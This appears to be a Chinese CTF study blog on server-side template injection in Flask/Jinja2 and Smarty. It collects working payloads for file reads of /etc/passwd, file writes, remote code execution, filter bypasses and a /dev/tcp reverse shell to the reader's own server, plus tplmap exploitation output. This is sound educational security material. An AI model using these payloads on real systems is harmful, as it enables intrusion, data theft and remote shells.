一文了解SSTI和所有常见payload 以flask模板为例
前言
做的ctf题里有好几道跟SSTI有关 故对SSTI进行学习 在此做个小结与记录
主要是flask模板 后面遇到别的模板再陆续记录
1、什么是SSTI
SSTI,服务器端模板注入(Server-Side Template Injection)
- 服务端接收攻击者的输入,将其作为Web应用模板内容的一部分
- 在进行目标编译渲染的过程中,进行了语句的拼接,执行了所插入的恶意内容
- 从而导致信息泄露、代码执行、GetShell等问题
- 其影响范围主要取决于模版引擎的复杂性
注意:模板引擎 和 渲染函数 本身是没有漏洞的 , 该漏洞的产生原因在于程序员对代码的不严禁与不规范 , 导致了模板可控 , 从而引发代码注入
主要的框架
- Python:jinja2、 mako、 tornado、 django
- php:smarty、 twig
- java:jade、 velocity
2、基础知识
模板引擎
模板引擎是以业务逻辑层和表现层分离为目的的,将规定格式的模板代码转换为业务数据的算法实现
也就是说,利用模板引擎来生成前端的html代码,模板引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板 用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。
但是新的模板引擎往往会有一些安全问题 , 即使大部分模板引擎有提供沙箱隔离机制 , 但同样存在沙箱逃逸技术来绕过
页面渲染
页面渲染
- 前端渲染( SPA , 单页面应用 ) 浏览器从服务器得到一些信息( 可能是 JSON 等各种数据交换格式所封装的数据包 , 也可能是合法的 HTML 字符串 ) 浏览器将这些信息排列组合成人类可读的 HTML 字符串 . 然后解析为最终的 HTML 页面呈现给用户 整个过程都是由客户端浏览器完成的 , 因此对服务器后端的压力较小 , 仅需要传输数据即可
- 后端渲染( SSR , 服务器渲染 ) 浏览器会直接接收到经过服务器计算并排列组合后的 HTML 字符串 , 浏览器仅需要将字符串解析为呈现给用户的 HTML 页面就可以了 . 整个过程都是由服务器完成的 , 因此对客户端浏览器的压力较小 , 大部分任务都在服务器端完成了 , 浏览器仅需要解析并呈现 HTML 页面即可
参考后端渲染html、前端模板渲染html,jquery的html,各有什么区别?
3、flask模板
看得资料和做的题好多都是flask相关 所以下面的内容以 Flask 框架为例( Flask 使用 Jinja2 作为模板引擎)
环境搭建
Pycharm 内置的 Flask 框架
http://127.0.0.1:5000可见到欢迎界面
在 Run/Debug Configuration 中配置 DEBUG 模式
这样每次修改源文件后 , 仅需要保存并且刷新页面就可以看到内容更新了
注意:实际运行环境时是不可开启 DEBUG 模式的 , 非常危险
渲染方法
Flask 中的渲染方法有两种 : render_template()
和 render_template_string()
render_template()
函数 渲染一个指定的文件 , 这个指定的文件其实就是模板
render_template_string()
函数 渲染一个字符串
注:SSTI与render_template_string()
函数密不可分
4、SSTI原理
一个最简单的例子
代码语言:javascript复制@app.route('/test')
def test():
html = '{{12*12}}'
return flask.render_template_string(html)
发现{{ --- }}
其中的语句被执行了
- 这是因为在flask中,渲染引擎Jinja2会将
{{ --- }}
视为变量标识符,会将其包含的内容作为变量处理,从而包裹的语句被执行 - 那么,在上一段代码中,如果我们传入的参数内容为
{{ --- }}
包裹的代码,这些代码就会被执行
沙箱逃逸
在上述例子中,虽然已经可以实现任意代码执行,但由于模板本身的沙盒安全机制,某些语句虽然可以执行,却不会执行成功
即使在服务器端将os包含进来,但是在渲染时仍然会出现这个错误,这就是因为沙盒机制严格地限制了程序的行为
沙箱逃逸的过程简单讲如下
借助的主要是各个类之间的继承关系 一些内建魔术方法如下
__class__
:用来查看变量所属的类,根据前面的变量形式可以得到其所属的类。
>>> ''.__class__
<type 'str'>
>>> ().__class__
<type 'tuple'>
>>> [].__class__
<type 'list'>
>>> {}.__class__
<type 'dict'>
__bases__
:用来查看类的基类,也可是使用数组索引来查看特定位置的值
>>> ().__class__.__bases__
(<type 'object'>,)
>>> ''.__class__.__bases__
(<type 'basestring'>,)
>>> [].__class__.__bases__
(<type 'object'>,)
>>> {}.__class__.__bases__
(<type 'object'>,)
>>> [].__class__.__bases__[0]
<type 'object'>
__mro__
:也可以获取基类
>>> ''.__class__.__mro__
(<class 'str'>, <class 'object'>)
>>> [].__class__.__mro__
(<class 'list'>, <class 'object'>)
>>> {}.__class__.__mro__
(<class 'dict'>, <class 'object'>)
>>> ().__class__.__mro__
(<class 'tuple'>, <class 'object'>)
>>> ().__class__.__mro__[1] # 使用索引就能获取基类了
<class 'object'>
代码语言:javascript复制
SSTI主要就是活用各种魔术方法
5、引擎判断
服务端使用的各种引擎支持的语法是不同的 所以在找到SSTI注入点之后,首先应当判断模板所使用的渲染引擎
通常可以使用以下payload来简单测试:
绿色为执行成功,红色为执行失败
另:{{7*'7'}}
在Twig中返回49
,在Jinja2中返回77777777
6、SSTI利用
一些SSTI的利用方法
XSS
以 GET 方式从 URL 处获取 code 参数的值 , 然后将它输出到页面 .
这段代码非常容易看出来存在安全隐患 . 后端没有对用户输入的内容进行过滤 , 就直接将它输出到页面 输入端是完全可控的 . 这就产生了代码域与数据域的混淆
任意文件读写
这里就要用到上面所说的魔术方法了
仍然是上面这个源码
- 获取字符串的类对象
>>> ''.__class__
<type 'str'>
- 寻找基类
>>> ''.__class__.__mro__
(<type 'str'>, <type 'basestring'>, <type 'object'>)
- 寻找可用引用
>>> ''.__class__.__mro__[2].__subclasses__()
[<type 'type'>, <type 'weakref'>, <type 'weakcallableproxy'>, <type 'weakproxy'>, <type 'int'>, <type 'basestring'>, <type 'bytearray'>, <type 'list'>, <type 'NoneType'>, <type 'NotImplementedType'>, <type 'traceback'>, <type 'super'>, <type 'xrange'>, <type 'dict'>, <type 'set'>, <type 'slice'>, <type 'staticmethod'>, <type 'complex'>, <type 'float'>, <type 'buffer'>, <type 'long'>, <type 'frozenset'>, <type 'property'>, <type 'memoryview'>, <type 'tuple'>, <type 'enumerate'>, <type 'reversed'>, <type 'code'>, <type 'frame'>, <type 'builtin_function_or_method'>, <type 'instancemethod'>, <type 'function'>, <type 'classobj'>, <type 'dictproxy'>, <type 'generator'>, <type 'getset_descriptor'>, <type 'wrapper_descriptor'>, <type 'instance'>, <type 'ellipsis'>, <type 'member_descriptor'>, <type 'file'>, <type 'PyCapsule'>, <type 'cell'>, <type 'callable-iterator'>, <type 'iterator'>, <type 'sys.long_info'>, <type 'sys.float_info'>, <type 'EncodingMap'>, <type 'fieldnameiterator'>, <type 'formatteriterator'>, <type 'sys.version_info'>, <type 'sys.flags'>, <type 'exceptions.BaseException'>, <type 'module'>, <type 'imp.NullImporter'>, <type 'zipimport.zipimporter'>, <type 'posix.stat_result'>, <type 'posix.statvfs_result'>, <class 'warnings.WarningMessage'>, <class 'warnings.catch_warnings'>, <class '_weakrefset._IterationGuard'>, <class '_weakrefset.WeakSet'>, <class '_abcoll.Hashable'>, <type 'classmethod'>, <class '_abcoll.Iterable'>, <class '_abcoll.Sized'>, <class '_abcoll.Container'>, <class '_abcoll.Callable'>, <type 'dict_keys'>, <type 'dict_items'>, <type 'dict_values'>, <class 'site._Printer'>, <class 'site._Helper'>, <type '_sre.SRE_Pattern'>, <type '_sre.SRE_Match'>, <type '_sre.SRE_Scanner'>, <class 'site.Quitter'>, <class 'codecs.IncrementalEncoder'>, <class 'codecs.IncrementalDecoder'>]
代码语言:javascript复制
可以看到有一个<type 'file'>
- 最终payload
''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()
也可以是
代码语言:javascript复制()..__class__.__bases__[0].__subclasses__()[40]('/etc/passwd').read()
object.__subclasses__()[40]('/etc/passwd').read()
写文件相仿
代码语言:javascript复制''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evil.txt', 'w').write('evil code')
().__class__.__bases__[0].__subclasses__()[40]('/tmp/evil.txt', 'w').write('evil code')
object.__subclasses__()[40]('/tmp/evil.txt', 'w').write('evil code')
任意代码执行
思路和任意文件读取非常类似 , 仅需要拿到 os 模块就可以了 可用payload如下
代码语言:javascript复制''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].system('ls')
''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()
# eval
''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('id').read()")
''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__.__builtins__.eval("__import__('os').popen('id').read()")
().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").popen("ls /var/www/html").read()' )
object.__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").popen("ls /var/www/html").read()' )
#__import__
''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__.__builtins__.__import__('os').popen('id').read()
''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__['__builtins__']['__import__']('os').popen('id').read()
反弹shell
代码语言:javascript复制''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('bash -i >& /dev/tcp/你的服务器地址/端口 0>&1').read()
这个 Payload 不能直接放在 URL 中执行 , 因为 &
的存在会导致 URL 解析出现错误
可以使用 BurpSuite 等工具构造数据包再发送
其他
request.environ
一个与服务器环境相关的对象字典 . 访问该字典可以拿到很多你期待的信息
config.items
一个类字典的对象 , 包含了所有应用程序的配置值 在大多数情况下 , 它包含了比如数据库链接字符串 , 连接到第三方的凭证 , SECRET_KEY等敏感值
- 一个小脚本
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
{% for b in c.__init__.__globals__.values() %}
{% if b.__class__ == {}.__class__ %}
{% if 'eval' in b.keys() %}
{{ b['eval']('__import__("os").popen("id").read()') }} //poppen的参数就是要执行的命令
{% endif %}
{% endif %}
{% endfor %}
{% endif %}
{% endfor %}
7、一些绕过
对一些过滤的绕过方法
过滤了小括号
用python的内置函数
- get_flashed_messages()
- url_for()
payload
代码语言:javascript复制{{url_for.__globals__}}
{{url_for.__globals__['current_app'].config['FLAG']}}
{{get_flashed_messages.__globals__['current_app'].config['FLAG']}}
过滤了 class
、 subclasses
、 read
等关键词
用request
- GET: request.args
- Cookies: request.cookies
- Headers: request.headers
- Environment: request.environ
- Values: request.values
一些用法
request.__class__
request["__class__"]
request|attr("__class__")
payload
代码语言:javascript复制{{''[request.args.a][request.args.b][2][request.args.c]()}}?a=__class__&b=__mro__&c=__subclasses__
过滤了下划线_
payload
代码语言:javascript复制{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}&class=class&usc=_
其实现过程如下
代码语言:javascript复制{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}
{{request|attr(["_"*2,"class","_"*2]|join)}}
{{request|attr(["__","class","__"]|join)}}
{{request|attr("__class__")}}
{{request.__class__}}
过滤了中括号[
和]
payload
代码语言:javascript复制{{request|attr((request.args.usc*2,request.args.class,request.args.usc*2)|join)}}&class=class&usc=_
{{request|attr(request.args.getlist(request.args.l)|join)}}&l=a&a=_&a=_&a=class&a=_&a=_
{{request|attr((request.args.usc*2,request.args.class,request.args.usc*2)|join)}}&class=class&usc=_
{{request|attr(request.args.getlist(request.args.l)|join)}}&l=a&a=_&a=_&a=class&a=_&a=_
过滤了|join
用|format
payload
{{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_
无敌绕过的最终RCE
绕过[
,]
检查,但不绕过__
检查
使用该set
函数来访问必需的object(i)
类
pop()
将检索file对象,然后使用我们的已知参数调用该对象
与初始RCE相似,这将创建一个python文件/tmp/foo.py
并执行print 1337
有效负载
{%set a,b,c,d,e,f,g,h,i = request.__class__.__mro__%}{{i.__subclasses__().pop(40)(request.args.file,request.args.write).write(request.args.payload)}}{{config.from_pyfile(request.args.file)}}&file=/tmp/foo.py&write=w&payload=print 1337
绕过所有黑名单检查的最终RCE (真牛逼)
代码语言:javascript复制{%set a,b,c,d,e,f,g,h,i = request|attr((request.args.usc*2,request.args.class,request.args.usc*2)|join)|attr((request.args.usc*2,request.args.mro,request.args.usc*2)|join)%}{{(i|attr((request.args.usc*2,request.args.subc,request.args.usc*2)|join)()).pop(40)(request.args.file,request.args.write).write(request.args.payload)}}{{config.from_pyfile(request.args.file)}}&class=class&mro=mro&subc=subclasses&usc=_&file=/tmp/foo.py&write=w&payload=print 1337
8、神器tplmap
github 需要环境:PyYaml
例子
代码语言:javascript复制root@kali:/mnt/hgfs/共享文件夹/tplmap-master# python tplmap.py -u "http://192.168.1.10:8000/?name=Sea" //判断是否是注入点
[ ] Tplmap 0.5
Automatic Server-Side Template Injection Detection and Exploitation Tool
[ ] Testing if GET parameter 'name' is injectable
[ ] Smarty plugin is testing rendering with tag '*'
[ ] Smarty plugin is testing blind injection
[ ] Mako plugin is testing rendering with tag '${*}'
[ ] Mako plugin is testing blind injection
[ ] Python plugin is testing rendering with tag 'str(*)'
[ ] Python plugin is testing blind injection
[ ] Tornado plugin is testing rendering with tag '{{*}}'
[ ] Tornado plugin is testing blind injection
[ ] Jinja2 plugin is testing rendering with tag '{{*}}'
[ ] Jinja2 plugin has confirmed injection with tag '{{*}}'
[ ] Tplmap identified the following injection point:
GET parameter: name //说明可以注入,同时给出了详细信息
Engine: Jinja2
Injection: {{*}}
Context: text
OS: posix-linux
Technique: render
Capabilities:
Shell command execution: ok //检验出这些利用方法对于目标环境是否可用
Bind and reverse shell: ok
File write: ok
File read: ok
Code evaluation: ok, python code
[ ] Rerun tplmap providing one of the following options:
//可以利用下面这些参数进行进一步的操作
--os-shell Run shell on the target
--os-cmd Execute shell commands
--bind-shell PORT Connect to a shell bind to a target port
--reverse-shell HOST PORT Send a shell back to the attacker's port
--upload LOCAL REMOTE Upload files to the server
--download REMOTE LOCAL Download remote files
9、smarty SSTI
smarty是基于PHP开发的,官方文档 于Smarty的SSTI的利用手段与常见的flask的SSTI有很大区别
注入点:
- XFF
- Client IP
确认漏洞:
- 输入
{$smarty.version}
,返回smarty的版本号
{php}{/php}
标签
Smarty支持使用{php}{/php}标签来执行被包裹其中的php指令
代码语言:javascript复制{php}phpinfo();{/php}
但在Smarty3的官方手册里有以下描述:
- Smarty已经废弃{php}标签,强烈建议不要使用
- 在Smarty 3.1,
{php}
仅在SmartyBC中可用
{literal}
标签
官方手册这样描述这个标签:
{literal}
可以让一个模板区域的字符原样输出- 这经常用于保护页面上的Javascript或css样式表,避免因为Smarty的定界符而错被解析
在php5的环境中可以使用
代码语言:javascript复制<script language="php">phpinfo();</script>
php7就不能用了
静态方法
通过self获取Smarty类再调用其静态方法实现文件读写
Smarty类的getStreamVariable方法的代码
代码语言:javascript复制public function getStreamVariable($variable)
{
$_result = '';
$fp = fopen($variable, 'r ');
if ($fp) {
while (!feof($fp) && ($current_line = fgets($fp)) !== false) {
$_result .= $current_line;
}
fclose($fp);
return $_result;
}
$smarty = isset($this->smarty) ? $this->smarty : $this;
if ($smarty->error_unassigned) {
throw new SmartyException('Undefined stream variable "' . $variable . '"');
} else {
return null;
}
}
这个方法可以读取一个文件并返回其内容 所以我们可以用self来获取Smarty对象并调用这个方法 很多文章里给的payload都形如:
代码语言:javascript复制{self::getStreamVariable("file:///etc/passwd")}
但在3.1.30的Smarty版本中官方已经把该静态方法删除
{if}
标签
官方文档中的描述:
- Smarty的
{if}
条件判断和PHP的if非常相似,只是增加了一些特性 - 每个
{if}
必须有一个配对的{/if}
,也可以使用{else}
和{elseif}
- 全部的PHP条件表达式和函数都可以在if内使用,如
||
,or
,&&
,and,
is_array(),
等等,如:{if is_array($array)}{/if}
payload
代码语言:javascript复制{if phpinfo()}{/if}
结语
对SSTI做了个总结归纳
参考
- Server-Side Template Injection
- Jinja2 template injection filter bypasses
- SSTI完全学习
- Flask/Jinja2 SSTI && Python 沙箱逃逸基础
- 从零学习flask模板注入
- Smarty SSTI
- CTF SSTI(服务器模板注入)
红客突击队于2019年由队长k龙牵头,联合国内多位顶尖高校研究生成立。其团队从成立至今多次参加国际网络安全竞赛并取得良好成绩,积累了丰富的竞赛经验。团队现有三十多位正式成员及若干预备人员,下属联合分队数支。红客突击队始终秉承先做人后技术的宗旨,旨在打造国际顶尖网络安全团队。